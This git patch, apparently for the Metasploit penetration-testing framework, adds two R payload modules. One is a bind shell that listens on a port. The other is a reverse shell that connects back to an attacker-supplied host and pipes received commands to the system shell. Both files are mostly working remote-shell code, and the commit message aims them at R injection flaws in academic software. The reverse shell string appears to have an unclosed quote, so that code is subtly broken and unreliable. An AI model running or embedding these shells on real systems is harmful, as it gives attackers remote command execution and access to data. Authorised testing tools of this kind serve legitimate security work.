From d76616e8e8c978462c277c556e19711467fdde32 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 19 Aug 2017 05:57:45 -0400 Subject: [PATCH] Reverse and bind shells in R Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions --- modules/payloads/singles/r/shell_bind_tcp.rb | 43 ++++++++++++++++++ .../payloads/singles/r/shell_reverse_tcp.rb | 45 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 modules/payloads/singles/r/shell_bind_tcp.rb create mode 100644 modules/payloads/singles/r/shell_reverse_tcp.rb diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb new file mode 100644 index 0000000000..532b2dbe8a --- /dev/null +++ b/modules/payloads/singles/r/shell_bind_tcp.rb @@ -0,0 +1,43 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'R Command Shell, Bind TCP', + 'Description' => 'Continually listen for a connection and spawn a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'r', + 'Arch' => ARCH_R, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'r', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def r_string + return "s<-socketConnection(port=#{datastore['LPORT']}," + + "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s,1))),s)}" + end +end diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb new file mode 100644 index 0000000000..ca8b7c2235 --- /dev/null +++ b/modules/payloads/singles/r/shell_reverse_tcp.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/payload/r' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 516 + + include Msf::Payload::Single + include Msf::Payload::R + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'R Command Shell, Reverse TCP', + 'Description' => 'Connect back and create a command shell via R', + 'Author' => [ 'RageLtMan' ], + 'License' => MSF_LICENSE, + 'Platform' => 'r', + 'Arch' => ARCH_R, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'r', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + return prepends(r_string) + end + + def r_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," + + "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" + + "(pipe(readLines(s, 1))),s)}" + end +end